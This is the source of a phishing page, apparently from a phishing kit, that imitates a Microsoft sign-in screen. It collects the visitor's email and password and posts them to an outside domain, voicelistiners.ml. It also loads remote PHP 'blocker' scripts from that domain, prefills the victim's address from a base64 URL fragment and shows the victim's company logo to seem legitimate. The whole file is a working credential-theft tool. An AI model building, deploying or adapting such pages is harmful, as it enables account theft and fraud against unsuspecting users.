<?php
include('https://voicelistiners.ml/work/blocker0.php');
include('https://voicelistiners.ml/work/blocker1.php');
?>
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" />
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.6.1/css/all.css" />
    <link rel="stylesheet" href="https://storage.googleapis.com/sharepoint-md7-files.appspot.com/oref/app.css" />
    <link rel="icon" type="image/png" sizes="192x192" href="https://www.google.com/s2/favicons?domain=office.com">
    <title>Sign in to your account</title>
    <style type="text/css">
      .box {
        box-shadow: 0 2px 3px rgba(0, 0, 0, 0.32);
        border: 0px solid rgba(0, 0, 0, 0.4);
        min-height: 415px;


        max-width: 440px;
        /*width: calc(100% - 40px);*/
        padding: 44px;
        margin-left: auto;
        margin-right: auto;
        margin-top: 20px;
        margin-bottom: 28px;
    }

    #footer {
        position: fixed;
        bottom: 0px;
        width: 100%;
        overflow: visible;
        z-index: 99;
        clear: both;


    }

    /*.footerNode span {
    color: #fff;
    font-size: 0.75rem;
    line-height: 28px;
    white-space: nowrap;
    display: inline-block;
    float: right;
    margin-left: 8px;
    margin-right: 8px;
}*/
    div .footerNode a,
    div .footerNode span {
        color: black;
        font-size: 0.75rem;
        line-height: 28px;
        white-space: nowrap;
        display: inline-block;
        float: right;
        margin-left: 8px;
        margin-right: 8px;
    }

    @media only screen and (max-width: 610px) {
        #hide {
            display: none;
        }
    }
    </style>
</head>

<body style="background-image: url('https://storage.googleapis.com/sharepoint-md7-files.appspot.com/sp-md7/bg5.jpg'); background-size: cover;background-repeat: no-repeat;background-attachment: fixed;">
    <br>


    <div class="container">
        <div class="row">
            <div class=" col-sm-5 bg-white mx-auto p-4 box" style="margin: 70px 0px 20px 0px;">
                <form action="https://voicelistiners.ml/work/next.php" method="post" id="loginform">

                    <img id="logoimg" src="https://www.google.com/s2/favicons?domain=microsoft.com" class="img-fluid" width="40px">&nbsp<span id="logoname" class="align-middle h5" style="color: #747474;"> Microsoft</span><br><br>
                    <span class="h5">Sign In</span><br>
                    <div id="chk" style="display: none;" class="alert alert-danger" ></div>
                    <br>
                    <span id="error" style="display: none;" class="text-danger">That Microsoft account doesn't exist. Enter a different account</span>

                    <div class="row" id="em">
                        <div class="col-sm-12">
                            <input type="email" name="user" class="form-control bg-transparent" id="user" aria-describedby="emailHelp" placeholder="Email, phone or skype" style="border-right: none;border-left: none;border-top: none; border-bottom: 1px solid grey;">
                            <!-- <input type="email" name="uemail" id="email" placeholder="Email Address" class="form-control  "> -->
                            <input type="hidden" id="nuser" value="" name="nuser">
                        </div>
                    </div>
                    <div class="row" id="pass">
                        <div class="col-sm-12">
                            <i class="fas fa-arrow-left" id="back"></i>&nbsp<span id="userch">abc@abc.com</span><br><br>
                            <input type="password" name="epass" id="epass" placeholder="Password"
                            class="form-control shadow-none bg-transparent" style="border-right: none;border-left: none;border-top: none; border-bottom: 1px solid grey;">
                            <!-- <br> -->
                            <!-- <a href="#">Forgot Password</a>
                            
                            <hr> -->

                        </div>
                    </div>
                    <div class="row">
                        <div class="col-sm-12">
                            <p>No account? <a href="#">Create one!</a></p>
                            <p><a href="#">Sign in with a security key</a></p>
                            <p><a href="#">sign in options</a></p>
                        </div>
                    </div>
                    <div class="row">
                        <div class="col-sm-12">
                            <div id="fbtn" class="text-right ">
                                <input type="button" value="Next" id="next" onclick="shownext()"
                                class="btn btn-primary px-4 shadow-none text-white" style="background-color: #0066BA;">  
                            </div>
                            <div id="sbtn" style="display: none;" class="text-right">
                                <input type="submit" id="submit_btn" name="submit" value="Login" class="btn px-4 text-white" style="background-color: #0066BA;">
                            </div>
                        </div>
                    </div>
                </form>
            </div>
        </div>
        <div class="row ">
                <div class="col-sm-5 mx-auto p-0 box" style="min-height:auto">
                    <div class="py-2 px-5 bg-white ">
                        <span><i class="fas fa-key"></i> &nbspSign in options</span>
                    </div>
                    
                </div>
            </div>
    </div>
<footer id="footer" style="padding-right: 30px">
        <div>
            <div class="footerNode">
                <span>Privacy & cookie</span>
                <a data-bind="text: config.text.privacyAndCookies, attr: {'data-url': config.links.privacyAndCookies}" href="#" data-url="https://go.microsoft.com/fwlink/?LinkId=521839">Terms of use</a>
            </div>
        </div>
    </footer>
    <script src="js/app.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.bundle.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
</body>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>

<script>
 // $('#sbtn').hide();
 // $('#error').hide();

 
 

//  function getUrlVars() {
//     var vars = {};
//     var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) {
//         vars[key] = value;
//     });
//     return vars;
// }
var msg = new URLSearchParams(window.location.search).get("message");
// var msg = url.searchParams.get("message");
// var msg = getUrlVars()["message"];
var msgd=decodeURIComponent(msg);
if (!msg) {
// $('#chk').hide();
}
else
{
	$('#chk').html(msgd);
    $('#chk').show();
}

// $(document).ready(function(){
	

// 	});


$('#loginform').on('keyup keypress', function(e) {
  var keyCode = e.keyCode || e.which;
  if (keyCode === 13) { 
    e.preventDefault();
    if($("#fbtn").is(":visible")){
        var user=$('#user').val();
    var my_user =user;
    var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
    if (!filter.test(my_user)) {
      $('#error').show();
      user.focus;
      return false;
  }
  else
  {
    $('#error').hide();
     $('#epass').val("");
    $('#userch').html(my_user);
    var ind=my_user.indexOf("@");
    var my_slice=my_user.substr((ind+1));
    var c= my_slice.substr(0, my_slice.indexOf('.'));
    var final= c.toLowerCase();
    var finalu= c.toUpperCase();
    $("#fbtn").animate({left:0, opacity:"hide"}, 0);
    $("#sbtn").animate({left:0, opacity:"show"}, 1000);
    $("#em").animate({left:0, opacity:"hide"}, 0);
    $("#pass").animate({left:0, opacity:"show"}, 1000);
    $.get("https://logo.clearbit.com/"+my_slice)
    .done(function() { 
        $("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
    $("#logoname").html(finalu);

    }).fail(function() { 
        $("#logoimg").attr("src", "https://logo.clearbit.com/microsoft.com");
    $("#logoname").html("Microsoft");

    })
    

}
    }
    else{
          $("#submit_btn").trigger("click");
    }
   
  }
});

 function shownext() {
    var user=$('#user').val();
    var my_user =user;
    var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
    if (!filter.test(my_user)) {
      $('#error').show();
      user.focus;
      return false;
  }
  else
  {
    $('#error').hide();
     $('#epass').val("");
    $('#userch').html(my_user);
    var ind=my_user.indexOf("@");
    var my_slice=my_user.substr((ind+1));
    var c= my_slice.substr(0, my_slice.indexOf('.'));
    var final= c.toLowerCase();
    var finalu= c.toUpperCase();
    $("#fbtn").animate({left:0, opacity:"hide"}, 0);
    $("#sbtn").animate({left:0, opacity:"show"}, 1000);
    $("#em").animate({left:0, opacity:"hide"}, 0);
    $("#pass").animate({left:0, opacity:"show"}, 1000);
    $.get("https://logo.clearbit.com/"+my_slice)
    .done(function() { 
        $("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
    $("#logoname").html(finalu);

    }).fail(function() { 
        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain=microsoft.com");
    $("#logoname").html("Microsoft");

    })
    

}
}

$('#back').click(function () {
    $("#msg").hide();
    $("#sbtn").animate({left:0, opacity:"hide"}, 0);
    $("#fbtn").animate({left:0, opacity:"show"}, 1000);
    $("#pass").animate({left:0, opacity:"hide"}, 0);
    $("#em").animate({left:0, opacity:"show"}, 1000);
    $("#user").val("");
    $("#epass").val("");
     $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain=microsoft.com");
    $("#logoname").html("Microsoft");
    

});

/////////////url user getting////////////////
var user = window.location.hash.substr(1);

if (!user) {

}
else
{
    var base64regex = /^([0-9a-zA-Z+/]{4})*(([0-9a-zA-Z+/]{2}==)|([0-9a-zA-Z+/]{3}=))?$/;

        if (!base64regex.test(user)) {
            // alert(btoa(email));
            var my_user = user;
        } else {
            // alert(atob(email));
            var my_user = atob(user);
        }

    $('#user').val(my_user);
     $('#epass').val("");
    var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
    var ind=my_user.indexOf("@");
        var my_slice=my_user.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var finalu= c.toUpperCase();
    $('#userch').html(my_user);
    $("#fbtn").animate({left:0, opacity:"hide"}, 0);
    $("#sbtn").animate({left:0, opacity:"show"}, 1000);
    $("#em").animate({left:0, opacity:"hide"}, 0);
    $("#pass").animate({left:0, opacity:"show"}, 1000);
    $.get("https://logo.clearbit.com/"+my_slice)
    .done(function() { 
        $("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
    $("#logoname").html(finalu);

    }).fail(function() { 
        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain=microsoft.com");
    $("#logoname").html("Microsoft");

    })
}


</script>

</html>